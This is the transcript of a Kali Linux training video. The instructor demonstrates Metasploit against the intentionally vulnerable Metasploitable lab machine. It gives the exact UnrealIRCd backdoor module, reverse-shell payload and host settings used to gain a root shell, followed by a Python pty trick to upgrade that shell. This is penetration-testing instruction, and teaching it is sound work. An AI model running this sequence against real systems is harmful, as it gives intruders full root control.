From the course: Kali Linux Essential Training
Exploiting Linux with Metasploit - Linux Tutorial
From the course: Kali Linux Essential Training
Exploiting Linux with Metasploit
- [Instructor] Let's see how we run exploits with Metasploit. We can select it from our favorites. Enter our password. And the Metasploit framework starts up. Metasploit includes a database of testing modules and payloads, including the meterpreter, a payload which provides a powerful remote shell. We can see that it has over 2,000 exploits and 1,391 payloads in its database right now, as well as a number of other modules. Exploit modules are run against a target system to check whether it's vulnerable, and payloads are sent into a target system to demonstrate that the exploit was successful by executing on the target. The help command shows all the commands that we can issue in Metasploit. There's a lot of commands we can use, grouped into core, module, job, resource, and various backend sections. We'll take a look at some of them now. We've already seen how we can search for exploits with the search command. For instance, search win8 provides the one exploit for Windows 8. We can also enter search, windows minus S date. And this provides a lot more Windows exploits sorted by date. These aren't necessarily due to vulnerabilities in the Windows operating system, as we can see by the latest listed, which is related to the Apache ActiveMQ vulnerability. Let's try and exploit against the Metasploitable system. We'll start for searching by IRC vulnerabilities. Okay, there's a range of exploits for DOS, Windows, Unix and so on. Let's select the Unix exploit called exploit/unix/irc/unreal_ircd_3281_backdoor. We'll copy the name of the exploit and put it into the use command. Okay, we've loaded the exploit. Let's check the targets this exploit works against by saying show targets. In this case, the exploit can determine what kind of target it has, so we can select automatic. Set target 0 which is the default. Let's have a look now at what payloads we can use with this exploit. Show payloads, and there's a number of command shells and a generic command execution. We can use the info command to get more information on the reverse shell. So let's have a look at cmd/unix/reverse and this creates an interactive shell on port 4444. This doesn't need administrative privileges, so let's go select it. Set payload cmd/unix/reverse. Now let's see what options we need to set to use this combination of exploits and payload. Show options We have to set the remote and local host addresses. The remote address for our Metasploitable system is set rhosts 10.0.2.32. And the local host is the Kali system we're running on, which is set lhost 10.0.2.100. Okay, let's run the exploit by saying exploit. A command shell has now been established on the remote system. The first thing we'll do is check who we are on the remote system. Whoami. Okay, we're on the remote system as root. Well, that's pretty cool. But it's a bit disconcerting not having a normal prompt. There's a little trick we can use to sort that out. We'll open a full bash shell using Python. All we need to do is enter python minus C, import pty;pty.spawn and what we're going to spawn is /bin/bash. And now we have a prompt. We can now do whatever we would normally do with a remote access to the system. For instance, we can list processes. We've exploited Metasploitable using an IRC exploit and now have complete root control. When we finish testing, we can enter control C to terminate the remote shell.
Practice while you learn with exercise files
Download the files the instructor uses to teach the course. Follow along and learn by watching, listening and practicing.
Download courses and learn on the go
Watch courses on your mobile device without an internet connection. Download courses using your iOS or Android LinkedIn Learning app.
